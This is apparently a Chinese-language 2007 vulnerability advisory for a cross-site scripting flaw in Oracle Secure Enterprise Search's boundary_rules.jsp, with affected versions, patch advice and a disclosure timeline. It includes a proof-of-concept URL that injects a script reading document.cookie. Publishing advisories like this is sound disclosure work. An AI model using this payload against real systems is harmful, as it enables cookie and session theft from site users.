当前位置: 安全纵横 > 安全公告

Oracle Secure Enterprise Search 跨站脚本漏洞

名称:Oracle Secure Enterprise Search 跨站脚本漏洞- SES01

涉及系统:Oracle Secure Enterprise Search 10.1.6- SES

安全级别:中风险

类型:Cross Site Scripting (XSS/CSS)

厂商URL :www.oracle.com

发现者 :Alexander Kornbrust

公告时间:17 April 2007 (V 1.00)

细节:Oracle Secure Enterprise Search 10g,一个独立于ORACLE数据库的产品, 能够用于安全的,高质量的,易使用的搜所企业信息。boundary_rules.jsp 的参数存在跨站脚本漏洞。

Exploit:

http://www.dbappsecurity.com:7777/search/admin/sources/boundary_rules.jsp?

event=deleteIncludeRule&p_src=web&p_mode=edit&p_id=3&pattern=www.dbappsecurity.com&

expType=%3Cscript%3Ealert(document.cookie)%3C/script%3ECC_SIMPLE_INCLUSION'

受影响的产品:Oracle Enterprise Search <10.1.8

补丁信息:

更新到最新版的SES 或者应用 CPU April 2007补丁包。

历史:

05-Apr-2005 Oracle 注意到该漏洞

06-Apr-2005 漏洞确认

17-apr-2007 Oracle发布CPU April 2007补丁包

17-apr-2007发布公告